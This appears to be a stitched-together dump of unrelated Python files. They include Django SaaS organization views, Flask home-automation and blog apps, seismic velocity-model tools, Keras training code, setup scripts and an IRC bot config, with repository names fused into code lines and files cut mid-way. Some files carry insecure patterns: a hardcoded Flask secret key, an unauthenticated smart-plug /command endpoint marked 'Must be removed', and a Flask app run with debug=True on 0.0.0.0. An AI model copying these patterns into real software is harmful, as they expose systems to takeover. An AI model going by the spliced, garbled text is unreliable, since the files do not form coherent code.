self.request.user.get_full_name(), "email": self.request.user.email, } ) return kwargs def get_redirect_url(self, *args, **kwargs): # pylint:disable=unused-argument redirect_path = validate_redirect_url_base( self.request.GET.get(REDIRECT_FIELD_NAME, None), sub=True, **kwargs ) if not redirect_path: try: redirect_path = reverse(self.pattern_name, args=(self.object,)) except NoReverseMatch: # Django==2.0 redirect_path = None return redirect_path def get_success_url(self): self.kwargs.update({"organization": self.object}) success_url = self.get_redirect_url(*self.args, **self.kwargs) return str(success_url) def get(self, request, *args, **kwargs): accessibles = self.organization_model.objects.accessible_by(request.user) count = accessibles.count() if count == 0: if self.get_implicit_create_on_none(): try: self.object = self.create_organization_from_user(request.user) return http.HttpResponseRedirect(self.get_success_url()) except IntegrityError: LOGGER.warning( "tried to implicitely create" " an organization that already exists.", extra={"request": request}, ) return super(OrganizationCreateView, self).get(request, *args, **kwargs) class DashboardView(OrganizationMixin, DetailView): """ High-level dashboard for a quick glance of the business in real-time. Template: To edit the layout of this page, create a local \ ``saas/metrics/dashboard.html`` (`example `__). Template context: - ``organization`` The provider object - ``request`` The HTTP request object """ model = get_organization_model() slug_url_kwarg = "organization" template_name = "saas/metrics/dashboard.html" def get_context_data(self, **kwargs): context = super(DashboardView, self).get_context_data(**kwargs) if self.organization.is_broker: urls = { "accounts_base": reverse("saas_profile"), "provider": {"api_accounts": reverse("saas_api_search_accounts")}, } else: urls = { "accounts_base": reverse("saas_profile"), "provider": { "api_accounts": reverse( "saas_api_subscribers", args=(self.organization,) ) }, } update_context_urls(context, urls) return context def get_object(self, queryset=None): return self.organization class OrganizationProfileView(OrganizationMixin, UpdateView): """ Page to update contact information of an ``Organization``. Template: To edit the layout of this page, create a local \ ``saas/profile/index.html`` (`example `__). Template context: - ``urls.organization.password_chage`` URL to update user password. - ``organization`` The organization object - ``request`` The HTTP request object """ model = get_organization_model() form_class = OrganizationForm slug_field = "slug" slug_url_kwarg = "organization" template_name = "saas/profile/index.html" def update_attached_user(self, form): validated_data = form.cleaned_data user = self.object.attached_user() if user: setattr( user, user.USERNAME_FIELD, validated_data.get("slug", user.get_username()), ) user.email = validated_data.get("email", user.email) if update_db_row(user, form): raise ValidationError("update_attached_user") return user def form_valid(self, form): validated_data = form.cleaned_data # Calls `get_object()` such that we get the actual values present # in the database. `self.object` will contain the updated values # at this point. changes = self.get_object().get_changes(validated_data) self.object.slug = validated_data.get("slug", self.object.slug) self.object.full_name = validated_data["full_name"] self.object.email = validated_data["email"] if "is_bulk_buyer" in validated_data: self.object.is_bulk_buyer = validated_data["is_bulk_buyer"] else: self.object.is_bulk_buyer = False if "extra" in validated_data: self.object.extra = validated_data["extra"] is_provider = self.object.is_provider if _valid_manager(self.request, [get_broker()]): self.object.is_provider = validated_data.get("is_provider", is_provider) try: with transaction.atomic(): self.update_attached_user(form) if update_db_row(self.object, form): raise ValidationError("form_valid") except ValidationError: return self.form_invalid(form) signals.organization_updated.send( sender=__name__, organization=self.object, changes=changes, user=self.request.user, ) return http.HttpResponseRedirect(self.get_success_url()) def get_form_class(self): if self.object.attached_user(): # There is only one user so we will add the User fields # to the form so they can be updated at the same time. return ManagerAndOrganizationForm return super(OrganizationProfileView, self).get_form_class() def get_initial(self): kwargs = super(OrganizationProfileView, self).get_initial() if Plan.objects.exists(): # Do not display the bulk buying option if there are no plans. kwargs.update({"is_bulk_buyer": self.object.is_bulk_buyer}) if _valid_manager(self.request, [get_broker()]): kwargs.update( {"is_provider": self.object.is_provider, "extra": self.object.extra} ) return kwargs def get_success_url(self): messages.info(self.request, "Profile updated.") return reverse("saas_organization_profile", args=(self.object,)) test = {'a': 5, 'b': 6, 'c' :5} print("initial ", test) def clean_dict_value(d, bad_val): # for k in list(d): for k in d.copy(): if d[k] == bad_val: del d[k] print("before changes ",test) print(list(test)) # so list(test) is actually shorthand for list(test.keys()) clean_dict_value(test, 5) print("after changes ",test) # 3b #out of place def clean_dict_values(d, bad_value_list): return {k:v for k,v in d.items() if v not in bad_value_list} # we can zip together two sequences and use them as we wish new_dict = {k:v*v for k,v in zip("kartupelis", range(10))} print(new_dict) cleaned_dict = clean_dict_values(new_dict, [4,64,25]) print(cleaned_dict)scripts/plot_fid.py100-1000 import pickle import os from tl2.proj.argparser import argparser_utils from tl2.proj.matplot import plt_utils def main(data_pkl, data_key, title, outdir): os.makedirs(outdir, exist_ok=True) with open(data_pkl, 'rb') as f: loaded_data = pickle.load(f) data_dict = loaded_data['FID_r64'] data = data_dict[data_key] fig, ax = plt_utils.get_fig_ax() ax.plot(data[:, 0], data[:, 1]) plt_utils.ax_set_ylim(ax, [0, 100]) plt_utils.ax_set_xlabel(ax, xlabel='Iters') plt_utils.ax_set_ylabel(ax, ylabel='FID') plt_utils.ax_set_title(ax, title=title, fontsize=20) plt_utils.savefig(saved_file=f"{outdir}/{data_key}.png", fig=fig, debug=True) pass if __name__ == '__main__': """ python scripts/plot_fid.py --data_key ffhq_r64 """ parser = argparser_utils.get_parser() argparser_utils.add_argument_str(parser, 'data_pkl', default="datasets/data/ffhq_fid.pkl") argparser_utils.add_argument_str(parser, 'data_key', default="") argparser_utils.add_argument_str(parser, 'title', default=r"FFHQ $64\times64$") argparser_utils.add_argument_str(parser, 'outdir', default="results/plot_fid") args, _ = parser.parse_known_args() argparser_utils.print_args(args) main(**vars(args))0 # :coding: utf-8 # :copyright: Copyright (c) 2015 ftrack import ftrack_api_old.entity.base class Component(ftrack_api_old.entity.base.Entity): '''Represent a component.''' def get_availability(self, locations=None): '''Return availability in *locations*. If *locations* is None, all known locations will be checked. Return a dictionary of {location_id:percentage_availability} ''' return self.session.get_component_availability( self, locations=locations ) class CreateThumbnailMixin(object): '''Mixin to add create_thumbnail method on entity class.''' def create_thumbnail(self, path, data=None): '''Set entity thumbnail from *path*. Creates a thumbnail component using in the ftrack.server location :meth:`Session.create_component ` The thumbnail component will be created using *data* if specified. If no component name is given, `thumbnail` will be used. The file is expected to be of an appropriate size and valid file type. .. note:: A :meth:`Session.commit` will be automatically issued. ''' if data is None: data = {} if not data.get('name'): data['name'] = 'thumbnail' thumbnail_component = self.session.create_component( path, data, location=None ) origin_location = self.session.get( 'Location', ftrack_api_old.symbol.ORIGIN_LOCATION_ID ) server_location = self.session.get( 'Location', ftrack_api_old.symbol.SERVER_LOCATION_ID ) server_location.add_component(thumbnail_component, [origin_location]) # TODO: This commit can be avoided by reordering the operations in # this method so that the component is transferred to ftrack.server # after the thumbnail has been set. # # There is currently a bug in the API backend, causing the operations # to *some* times be ordered wrongly, where the update occurs before # the component has been created, causing an integrity error. # # Once this issue has been resolved, this commit can be removed and # and the update placed between component creation and registration. self['thumbnail_id'] = thumbnail_component['id'] self.session.commit() return thumbnail_component Scripts/main.py # The executable was compiled with pyinstaller import os import sys import argparse from pathlib import Path from const import Const from forms import Forms from games import Games from updater import Updater from settings import Settings updater = Updater(Const.updateurl, Const.version) games = Games(Const.gamesjsonpath) settings = Settings(Const.settingsjsonpath) forms = Forms(updater=updater, games=games, settings=settings) parser = argparse.ArgumentParser() parser.add_argument('--noui', action='store_true') parser.add_argument('--name') parser.add_argument('--path') parser.add_argument('--host', action='store_true') args = parser.parse_args() if __name__ == "__main__": if args.name is not None and args.path is not None: if args.host is not None: games.addgame(args.name, args.path, args.host) else: games.addgame(args.name, args.path) if not args.noui: if not os.path.isfile(Const.gamesjsonpath): if "RemotePlayTogetherHelper" in Path(sys.executable).stem: forms.showSetup() else: forms.showUpdate() forms.showAddGame() forms.showUpdate() while True: forms.showGamelist() # C:\Python\Python3.7.2\Scripts\pyinstaller.exe --onefile main.pyshania3322/joeynmt0 # Copyright (c) Facebook, Inc. and its affiliates. # All rights reserved. # # This source code is licensed under the license found in the # LICENSE file in the root directory of this source tree. # import os.path as op from pathlib import Path FILE_ROOT = Path(__file__).parent with open(op.join(FILE_ROOT, 'VERSION')) as f: __version__ = f.read() from vizseq.ipynb import * from vizseq.ipynb import fairseq_viz as fairseq from setuptools import setup, find_packages setup( name='gros', version='0.3.0', description="General Robot Operator System", author="GRB_ResearchLab", author_email="", packages=find_packages(), include_package_data=True, install_requires=[ 'Click', ], entry_points=''' [console_scripts] gros=gros.gros:cli ''', ) thumblelog/tumblelog/__init__.py from flask import Flask from flask.ext.mongoengine import MongoEngine app = Flask(__name__) app.config["MONGODB_SETTINGS"] = {'DB': "my_tumble_log"} app.config["SECRET_KEY"] = "KeepThisS3cr3t" db = MongoEngine(app) def register_blueprints(app): # Prevents circular imports from tumblelog.views import posts from tumblelog.admin import admin app.register_blueprint(posts) app.register_blueprint(admin) register_blueprints(app) if __name__ == '__main__': app.run()api/rest.py import json import logging import os from logging.handlers import RotatingFileHandler import jsondiff from flask import Flask, render_template, request, jsonify import core.database as db import deg_by_min from core.manager import Manager app = Flask(__name__) @app.route("/__test") def test(): return "running" #### Must be removed @app.route("/command") def command(): action = request.args.get("action").lower() plug = request.args.get("plug") if not action in ["on", "off"]: return "Error - action must be on or off." with open(os.path.join(os.environ["MYH_HOME"], "data", "plugs.json"), 'r') as plugs_file: plug_data = json.load(plugs_file) if not plug in plug_data: return "Error - " + plug + " is not a plug entry." else: plug_data[plug]["plug_state"] = action # save the action for manager with open(os.path.join(os.environ["MYH_HOME"], "data", "plugs.json"), 'w') as plugs_file: json.dump(plug_data, plugs_file) # do the action my_manager = Manager() my_manager.turn_on_off_plug(plug, action) return "done" #### @app.route("/plugs", methods=['GET', 'POST']) def plugs(): with open(os.path.join(os.environ["MYH_HOME"], "data", "plugs.json"), 'r') as plugs_file: plug_data = json.load(plugs_file) if request.method == 'GET': return jsonify(plug_data) else: content = request.get_json() # Compare two structs diff = jsondiff.diff(plug_data, content) if not diff.keys(): # save the action for manager with open(os.path.join(os.environ["MYH_HOME"], "data", "plugs.json"), 'w') as plugs_file: json.dump(content, plugs_file) return "done" else: return "Error in structure !" @app.route("/deg_by_min") def compute(): return str(deg_by_min.compute_deg_by_min()) @app.route("/weather") def weather(): res = [] with open(os.path.join(os.environ["MYH_HOME"], "data", "weather.json"), 'r') as weather_file: weather_dict = json.load(weather_file) res.append(weather_dict["temp_avg"]) res.append(weather_dict["temp_out"]) res.append(weather_dict["hum_avg"]) res.append(weather_dict["hum_out"]) return '-'.join(str(e) for e in res) @app.route("/charts_dev") def charts_dev(): if not 'day' in request.args: day = 7 else: day = request.args.get('day') myh_db = db.MyHomessistantDatabase() myh_db.connection() data_dict = myh_db.get_charts_dataset(day) # Get act temperature with open(os.path.join(os.environ["MYH_HOME"], "data", "weather.json"), 'r') as weather_file: t_act = json.load(weather_file)["temp_avg"] data_dict["t_act"] = "{0:.2f}".format(t_act) # Json data_sed ready to be sent to myh_db.close() return render_template("charts_dev.html", **locals()) @app.route("/dashboard") def charts(): if not 'day' in request.args: day = 7 else: day = request.args.get('day') myh_db = db.MyHomessistantDatabase() myh_db.connection() data_dict = myh_db.get_charts_dataset(day) # Get act temperature with open(os.path.join(os.environ["MYH_HOME"], "data", "weather.json"), 'r') as weather_file: t_act = json.load(weather_file)["temp_avg"] data_dict["t_act"] = "{0:.2f}".format(t_act) # Json data_sed ready to be sent to myh_db.close() return render_template("dashboard.html", **locals()) if __name__ == '__main__': app.logger.setLevel(logging.INFO) # use the native logger of flask app.logger.disabled = False formatter = logging.Formatter('%(asctime)s %(levelname)s %(funcName)s(%(lineno)d) %(message)s') logfile = os.path.join(os.environ["MYH_HOME"], 'logs', 'rest.log') handler = RotatingFileHandler(logfile, mode='a', maxBytes=5 * 1024 * 1024, backupCount=2, encoding=None, delay=0) handler.setFormatter(formatter) log = logging.getLogger('werkzeug') log.setLevel(logging.INFO) log.addHandler(handler) app.run(debug=True, port=5005, host="0.0.0.0") gely/coseis """ SCEC Community Velocity Model (CVM-H) tools. """ import os import urllib import tarfile import numpy from . import home from . import data from . import vm1d from . import gocad from . import interp repository = home + 'repo' projection = {'proj': 'utm', 'zone': 11, 'datum': 'NAD27', 'ellps': 'clrk66'} extent = (131000.0, 828000.0), (3431000.0, 4058000.0), (-200000.0, 4900.0) prop2d = {'topo': '1', 'base': '2', 'moho': '3'} prop3d = {'vp': '1', 'vs': '3', 'tag': '2'} versions = ['vx62', 'vx63', '11.2.0', '11.9.0'] voxet3d = {'mantle': 'CVM_CM', 'crust': 'CVM_LR', 'lab': 'CVM_HR'} def vs30_model(x, y, version='Wills+Wald', method='nearest'): if version not in ['Wills', 'Wald', 'Wills+Wald']: raise Exception() if 'Wald' in version: z = data.vs30_wald(x, y, method=method) else: z = numpy.empty_like(x) z.fill(float('nan')) if 'Wills' in version: delta = 0.000439344930055 x0 = -121.12460921883338 y0 = 32.53426695497164 f = repository + 'Vs30-Wills-CVMH.npy' w = numpy.load(f, mmap_mode='c') xlim = x0, x0 + delta * (w.shape[0] - 1) ylim = y0, y0 + delta * (w.shape[1] - 1) extent = xlim, ylim interp.interp2(extent, w, (x, y), z, method=method) return z def nafe_drake(f): """ Density derived from V_p via Nafe-Drake curve, Brocher (2005) eqn 1. """ f *= 0.001 f = f * ( 1.6612 - f * (0.4721 - f * (0.0671 - f * (0.0043 - f * 0.000106)))) f = numpy.maximum(f, 1.0) * 1000.0 return f def brocher_vp(f): """ V_p derived from V_s via Brocher (2005) eqn 9. """ f *= 0.001 f = 0.9409 + f * (2.0947 - f * (0.8206 - f * (0.2683 - f * 0.0251))) f *= 1000.0 return f def ely_vp(f): """ V_p derived from V_s via Ely (2012). """ f = 400.0 + 1.4 * f return f def cvmh_voxet(prop=None, voxet=None, no_data_value=None, version=None): """ Download and read SCEC CVM-H voxet. Parameters: prop: 2d property: 'topo', 'base', or 'moho' 3d property: 'Vp', 'Vs', or 'tag' voxet: 3d voxet: 'mantle', 'crust', or 'lab' no_data_value: None, 'nan', or float value. None = filled from below. version: 'vx62', 'vx63', '11.2.0', '11.9.0' or None (default) Returns: extent: (x0, x1), (y0, y1), (z0, z1) data: Array of properties """ if version is None: version = versions[-1] path = repository + 'CVMH-%s' % version if version[:2] == 'vx': u = 'http://structure.harvard.edu/cvm-h/download/%s.tar.bz2' f = path + '.bztar' base = '%s/bin' else: u = 'http://hypocenter.usc.edu/research/cvmh/11.9.0/cvmh-%s.tar.gz' f = path + '.tgz' base = 'cvmh-%s/model' u %= version base %= version # download if not found if not os.path.exists(path): if not os.path.exists(f): print('Downloading %s' % u) urllib.urlretrieve(u, f) print('Extracting %s' % f) tar = tarfile.open(f) os.mkdir(path) with tar as tar: for t in tar: if not t.name.startswith(base): continue if t.name.endswith('.vo') or t.name.endswith('@@'): f = os.path.join(path, os.path.split(t.name)[1]) open(f, 'wb').write(tar.extractfile(t).read()) # fill 3d voxets turd = os.path.join(path, 'filled') if not os.path.exists(turd): for vox in voxet3d: print('Filling voxet %s %s' % (version, vox)) vp, vs, tag = prop3d['vp'], prop3d['vs'], prop3d['tag'] vid = voxet3d[vox] voxfile = os.path.join(path, vid + '.vo') vox = gocad.voxet(voxfile, [vp, vs, tag])['1'] w = vox['AXIS']['W'][2] d1 = vox['PROP'][vp]['DATA'] d2 = vox['PROP'][vs]['DATA'] d3 = vox['PROP'][tag]['DATA'] v1 = vox['PROP'][vp]['NO_DATA_VALUE'] v2 = vox['PROP'][vs]['NO_DATA_VALUE'] n = d1.shape[2] if w > 0.0: for i in range(1, n): ii = (d1[:, :, i] == v1) | (d2[:, :, i] == v2) d1[:, :, i][ii] = d1[:, :, i-1][ii] d2[:, :, i][ii] = d2[:, :, i-1][ii] d3[:, :, i][ii] = d3[:, :, i-1][ii] else: for i in range(n-1, 0, -1): ii = (d1[:, :, i-1] == v1) | (d2[:, :, i-1] == v2) d1[:, :, i-1][ii] = d1[:, :, i][ii] d2[:, :, i-1][ii] = d2[:, :, i][ii] d3[:, :, i-1][ii] = d3[:, :, i][ii] f1 = os.path.join(path, vox['PROP'][vp]['FILE'] + '-filled') f2 = os.path.join(path, vox['PROP'][vs]['FILE'] + '-filled') f3 = os.path.join(path, vox['PROP'][tag]['FILE'] + '-filled') d1.T.tofile(f1) d2.T.tofile(f2) d3.T.tofile(f3) open(turd, 'w') # voxet ID if voxet in voxet3d: vid = voxet3d[voxet] else: vid = 'interfaces' voxfile = os.path.join(path, vid + '.vo') # load voxet if prop is None: return gocad.voxet(voxfile) prop = prop.lower() if prop in prop2d: pid = prop2d[prop] else: pid = prop3d[prop] if no_data_value is None and prop in prop3d: vox = gocad.voxet(voxfile, [pid], alternate='-filled')['1'] else: vox = gocad.voxet(voxfile, [pid], no_data_value=no_data_value)['1'] # extent x, y, z = vox['AXIS']['O'] u, v, w = vox['AXIS']['U'][0], vox['AXIS']['V'][1], vox['AXIS']['W'][2] extent = (x, x + u), (y, y + v), (z, z + w) # property data data = vox['PROP'][pid]['DATA'] return extent, data class Model(): """ SCEC CVM-H model. Init parameters: prop: 2d property: 'topo', 'base', 'moho' 3d property: 'vp', 'vs', or 'tag' voxet: 3d voxet list: ['mantle', 'crust', 'lab'] no_data_value: None or float value (can be float('nan'). None = filled from below. version: 'vx62', 'vx63', '11.2.0', 11.9.0' or None (default) Call parameters: x, y, z: Sample coordinate arrays. out: Optional output array with same shape as coordinate arrays. interpolation: 'nearest', or 'linear' Returns property samples at coordinates (x, y, z) """ def __init__( self, prop, voxet=['mantle', 'crust'], no_data_value=None, version=None ): self.prop = prop = prop.lower() if prop in prop2d: self.voxet = [cvmh_voxet(prop, version=version)] else: self.voxet = [] for i in voxet: self.voxet += [cvmh_voxet(prop, i, no_data_value, version)] return def __call__(self, x, y, z=None, out=None, interpolation='nearest'): if out is None: out = numpy.empty_like(x) out.fill(float('nan')) for extent, v in self.voxet: if z is None: v = v.reshape(v.shape[:2]) interp.interp2(extent[:2], v, (x, y), out, interpolation) else: interp.interp3(extent, v, (x, y, z), out, interpolation) return out class Extraction(): """ CVM-H extraction with geotechnical layer (GTL) Init parameters: x, y: Coordinates arrays vm: 'vp', 'vs', 'tag', or Model object. vs30: 'Wills', 'Wald', 'Wills+Wald', None, or Model object. topo: 'topo' or Model object. interpolation: 'nearest', or 'linear'. geographic: X Y coordinate type, True for geographic, False for UTM. **kwargs: Keyword arguments passed to Model() Call parameters z: Vertical coordinate array. out: Optional output array, same shape as coordinate arrays. min_depth: Minimum depth in Z array, optional but provides speed-up. by_depth: Z coordinate type, True for depth, False for elevation. Returns property samples at coordinates (x, y, z) """ def __init__( self, x, y, vm, vs30='Wills+Wald', topo='topo', interpolation='nearest', geographic=True, **kwargs ): x = numpy.asarray(x) y = numpy.asarray(y) if isinstance(vm, str): vm = Model(vm, **kwargs) if vm.prop in prop2d: raise Exception('Cannot extract 2D model') elif vm.prop == 'tag': vs30 = None if isinstance(topo, str): topo = Model(topo, **kwargs) if geographic: import pyproj lon, lat = x, y proj = pyproj.Proj(**projection) x, y = proj(lon, lat) x = x.astype(lon.dtype) y = y.astype(lat.dtype) z0 = topo(x, y, interpolation='linear') if vs30 is None: zt = None else: zt = 350.0 if not geographic: import pyproj proj = pyproj.Proj(**projection) lon, lat = proj(x, y, inverse=True) lon = lon.astype(x.dtype) lat = lat.astype(y.dtype) v0 = vs30_model(lon, lat, vs30) if vm.prop == 'vp': v0 = ely_vp(v0) vt = vm(x, y, z0 - zt, interpolation=interpolation) v0 = numpy.minimum(vt, v0) # XXX new feature if numpy.isnan(vt).any(): print('WARNING: NaNs in GTL') self.gtl = v0, vt self.x, self.y, self.z0, self.zt = x, y, z0, zt self.vm, self.interpolation = vm, interpolation return def __call__(self, z, out=None, min_depth=None, by_depth=True): x, y, z0, zt = self.x, self.y, self.z0, self.zt vm, interpolation = self.vm, self.interpolation z = numpy.asarray(z) if out is None: out = numpy.empty_like(z) out.fill(float('nan')) if by_depth is False: vm(x, y, z, out, interpolation) z = z0 - z else: vm(x, y, z0 - z, out, interpolation) if zt: if min_depth is None: min_depth = z.min() if min_depth < zt: v0, vt = self.gtl i = z < zt out[i] = vm1d.v30gtl(v0, vt, z, zt)[i] return out def extract(x, y, z, vm=['rho', 'vp', 'vs'], by_depth=True, **kwargs): """ Simple CVM-H extraction. x, y, z: Coordinates arrays vm: 'rho', 'vp', 'vs', 'tag', or Model object. by_depth: Z coordinate type, True for depth, False for elevation. **kwargs: Keyword arguments passed to Extraction() Returns property samples at coordinates (x, y, z) """ x = numpy.asarray(x) y = numpy.asarray(y) if not isinstance(vm, (list, tuple)): vm = [vm] out = [] f = None for v in vm: prop = v = v.lower() if v == 'rho': prop = 'vp' if not out or prop != f.vm.prop: f = Extraction(x, y, prop, **kwargs) if v == 'rho': out += [nafe_drake(f(z, by_depth=by_depth))] else: out += [f(z, by_depth=by_depth)] return numpy.array(out) import seren3, sys from seren3.analysis.visualization import EngineMode path = sys.argv[1] iout = int(sys.argv[2]) snap = seren3.load_snapshot(path, iout) halos = snap.halos(finder='ctrees') h = halos.sort("Mvir")[0] proj = h.d.projection("mass", mode=EngineMode.SPLATTER)# import the necessary packages from imutils import paths import numpy as np import argparse import imutils import cv2 images = [] images.append(cv2.imread('01_suburbA.jpg')) images.append(cv2.imread('01_suburbB.jpg')) print("[INFO] stitching images...") stitcher = cv2.createStitcher() if imutils.is_cv3() else cv2.Stitcher_create() (status, stitched) = stitcher.stitch(images) try: import os if os.environ.get("PIPUPGRADE_JOBS_GEVENT_PATCH"): from gevent import monkey monkey.patch_all(threaded = False, select = False) except ImportError: pass # imports - module imports from pipupgrade.__attr__ import ( __name__, __version__, __author__ ) from pipupgrade.__main__ import main from pipupgrade.config import Settings from pipupgrade import _pip from pipupgrade.util.jobs import run_all as run_all_jobs, run_job settings = Settings() from pipupgrade.tree import Nodefrom .base import * from .case1 import case_1 from .case2 import case_2 from .case3 import case_3 from .case4 import case_4 from .case5 import case_5 # -*- coding: utf-8 -*- """ Settings module for lichessmate. Make sure you fill in every setting correctly. """ # Server address (e.g. 'irc.server.org') SERVER = 'irc.quakenet.org' # Port number (as an inteher! e.g. 6667) PORT = 6667 # Channel (e.g. '#mychannel') CHANNEL = '#chesstest' # Nickname of the bot NICKNAME = 'dasdasbas' # A list of lichess usernames to monitor. E.g. ['lichess_username1', 'lichess_username2',] PLAYERS = ['cocostarc', 'TheNoobyOne'] # 3600 seconds = 1h, 1800s=30min, 900s=15min, 300s=5min # The delay between requests for checking if any user in PLAYERS is currently playing. GET_PLAYING_DELAY = 300 # Delay in seconds # How long to wait until posting info again about a user whose info was posted. GET_PLAYER_DELAY = 3600 # Delay in seconds M-k-03/PythonATTD # file:features/steps/awsS3Step.py # ---------------------------------------------------------------------------- # STEPS: # ---------------------------------------------------------------------------- from behave import given, when, then # from hamcrest import assert_that, equal_to from blender import Blender @when('Download files from S3') def step_when_switch_blender_on(context): # context.blender.downloadfile_to_s3() print("Downloaded Files from S3") @when('Upload files to S3') def step_when_switch_blender_on(context): # context.blender.uploadfile_to_s3() print("Uploaded Files to S3") @when('Bucket is Created') def step_when_switch_blender_on(context): # context.blender.createbucket_in_s3() print("Bucket Created")1-10 from __future__ import print_function, division, absolute_import version="0.6.1" from .treeanc import TreeAnc from .treetime import TreeTime, plot_vs_years from .clock_tree import ClockTree from .treetime import ttconf as treetime_conf from .gtr import GTR from .merger_models import Coalescent from .treeregression import TreeRegression from .argument_parser import make_parser nickdelgrosso/dvc import logging from ..utils import parse_target from . import locked logger = logging.getLogger(__name__) @locked def remove(self, target, dvc_only=False): from ..dvcfile import Dvcfile, is_valid_filename path, name = parse_target(target) stages = self.get_stages(path, name) for stage in stages: stage.remove_outs(force=True) if path and is_valid_filename(path) and not dvc_only: Dvcfile(self, path).remove() return stages mbti/train.py import os import argparse import timeit import numpy as np import data_process import tensorflow as tf from tensorflow import keras DEFAULT_EPOCHS = 40 DEFAULT_BATCH_SIZE = 64 DEFAULT_TRAIN_FRACTION = .8 DEFAULT_EVAL_FRACTION = .2 DEFAULT_EMBEDDING_DIM = 300 MODEL_FILE_NAME_TEMPLATE = 'model_seq_{}_epoch_{}_embedding_{}_{}.h5' def train_category(category, train_x, train_y, test_x, test_y, embedding_layers, eval_split, epoch, batch_size): start = timeit.default_timer() model = keras.Sequential() model.add(embedding_layers) # model.add(keras.layers.GlobalAveragePooling1D()) model.add(keras.layers.Bidirectional(keras.layers.LSTM(64))) # model.add(keras.layers.Dense(16, activation=tf.nn.relu)) model.add(keras.layers.Dense(1, activation=tf.nn.sigmoid)) model.summary() model.compile(optimizer=tf.train.AdamOptimizer(), loss='binary_crossentropy', metrics=['accuracy']) history = model.fit(train_x, train_y, epochs=epoch, batch_size=batch_size, validation_split=eval_split, shuffle=True, verbose=1) results = model.evaluate(test_x, test_y) outputs = model.predict(test_x) predicted = np.round(outputs).reshape(len(outputs)).astype(int) print('MODEL: {}, outputs: {}'.format(category, outputs)) print('MODEL: {}, predicted: {}'.format(category, predicted)) end = timeit.default_timer() print('MODEL: {} is trained in {}s ({}s per epoch), results: {}'.format( category, round(end - start), round((end - start) / epoch), results)) return model def train_by_columns(data_file, voc_file, model_dir, glove_dir, epoch, batch_size, train_split, eval_split, embedding_dim): print('training: data = {}, voc = {}, ' 'epochs = {}, batch size = {}, ' 'glove dir = {}, embedding dim = {} ---> models = {}'.format(data_file, voc_file, epoch, batch_size, glove_dir, embedding_dim, model_dir)) train_x, train_y, test_x, test_y = data_process.load_data( data_file, train_split) vocab = data_process.load_vocab(voc_file) max_seq = train_x.shape[1] vocab_size = len(vocab) + 1 print('training: sequence length = {}, vocabulary size = {}'.format( max_seq, vocab_size)) embedding_layers = data_process.load_embeddings( vocab, max_seq, glove_dir, embedding_dim) for i in range(0, 4): model_name = 'model_{}'.format(i) model = train_category(model_name, train_x, train_y.iloc[:, i], test_x, test_y.iloc[:, i], embedding_layers, eval_split, epoch, batch_size) model.save(os.path.join(model_dir, MODEL_FILE_NAME_TEMPLATE.format(max_seq, epoch, embedding_dim, i))) def real_main(): ap = argparse.ArgumentParser() io_group = ap.add_argument_group('input and output arguments') io_group.add_argument("-d", "--data-file", required=True, help="specify pre-proceed MBTI data set file") io_group.add_argument("-v", "--voc-file", required=True, help="specify vocabulary file") io_group.add_argument("-m", "--model-dir", required=True, help="specify directory of output models") io_group.add_argument("-g", "--glove-dir", required=True, help="specify directory of Glove") ml_group = ap.add_argument_group('learning parameters') ml_group.add_argument("-ts", "--train-split", required=False, type=float, default=DEFAULT_TRAIN_FRACTION, help="specify split fraction of train set") ml_group.add_argument("-es", "--eval-split", required=False, type=float, default=DEFAULT_EVAL_FRACTION, help="specify split fraction of evaluate set in each epoch") ml_group.add_argument("-ep", "--epoch", required=False, type=int, default=DEFAULT_EPOCHS, help="specify epoch count") ml_group.add_argument("-bs", "--batch-size", required=False, type=int, default=DEFAULT_BATCH_SIZE, help="specify batch size in each epoch") ml_group.add_argument("-ed", "--embedding-dim", required=False, type=int, choices=[50, 100, 200, 300], default=DEFAULT_EMBEDDING_DIM, help="specify batch size in each epoch") args = ap.parse_args() if not os.path.isdir(args.model_dir): os.mkdir(args.model_dir) train_by_columns(args.data_file, args.voc_file, args.model_dir, args.glove_dir, args.epoch, args.batch_size, args.train_split, args.eval_split, args.embedding_dim) if __name__ == "__main__": real_main() problems/array-partition-i/solution.py # 先对给定数列排序(此处为升序);视元素为成对出现,则取数对中的第一个数字即是取出数对中的较小元素(操作中取排序后的数列的所有第奇数个就行);最后求和。 class Solution: def arrayPairSum(self, nums: [int]) -> int: return sum(sorted(nums)[::2])10-100 #!/usr/bin/env python from distutils.core import setup __version__ = "0.1" setup(name="twisted_hang", version=__version__, description="Figure out if the main thread is hanging, and if so, what's causing it to hang.", author="", license="MIT", url="https://github.com/ggreer/twisted_hang", download_url="https://github.com/ggreer/twisted_hang.git", ) import websockets import asyncio import sys async def wss_subscribe(queue: asyncio.Queue, channel_name: list = ["ticker-xbt-aud"]): try: if len(channel_name) > 1: channel = ",".join(channel_name) else: channel = channel_name[0] WSS_URL = f"wss://websockets.independentreserve.com?subscribe={channel}" async with websockets.connect(WSS_URL) as websocket: while True: data = await websocket.recv() data = data.encode("utf-8") await queue.put(data) except Exception as error: print(error) sys.exit(1) from osziplotter.Util import get_timestamp_readable from osziplotter.modelcontroller.PlotEvents import PlotEvents from osziplotter.modelcontroller.PlotInfo import PlotInfo from PyQt5.QtWidgets import QComboBox from typing import Dict, List class PlotComboBox(QComboBox, PlotEvents): def __init__(self, *args, **kwargs) -> None: super(PlotComboBox, self).__init__(*args, **kwargs) self.setDisabled(True) self.addItem("No plot available") self.activated.connect(self._select_plot) self._timestamps: List[float] = [] def _select_plot(self, index: int) -> None: self.update_selected_plot(self._timestamps[index]) def update_plot(self, plots: Dict[float, PlotInfo], visible_plot: PlotInfo = None) -> None: self.clear() if visible_plot is None: self.setDisabled(True) self.addItem("No plot available") else: self.setEnabled(True) timestamps_str = [get_timestamp_readable(plot.timestamp) for plot in plots.values()] self.addItems(timestamps_str) self._timestamps = [plot.timestamp for plot in plots.values()] self.setCurrentIndex(list(plots.values()).index(visible_plot)) from django.contrib.auth.models import AbstractUser from django.contrib.auth.validators import ASCIIUsernameValidator from django.contrib.postgres.fields import CICharField from django.db import models from django.utils.translation import ugettext_lazy as _ class User(AbstractUser): username_validator = ASCIIUsernameValidator() username = CICharField( _('username'), max_length=150, unique=True, help_text=_('Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.'), validators=[username_validator], error_messages={ 'unique': _("A user with that username already exists."), }, ) email = models.EmailField(_('email address'), unique=True) class Meta: verbose_name = _('user') verbose_name_plural = _('users') db_table = 'user' roysubhankar/L2Cmodels/lenet.py import torch import torch.nn as nn class LeNet(nn.Module): def __init__(self, out_dim=10, in_channel=1, img_sz = 28): super(LeNet, self).__init__() feat_map_sz = img_sz//4 self.n_feat = 50 * feat_map_sz * feat_map_sz # !!! [Architecture design tip] !!! # The KCL has much better convergence of optimization when the BN layers are 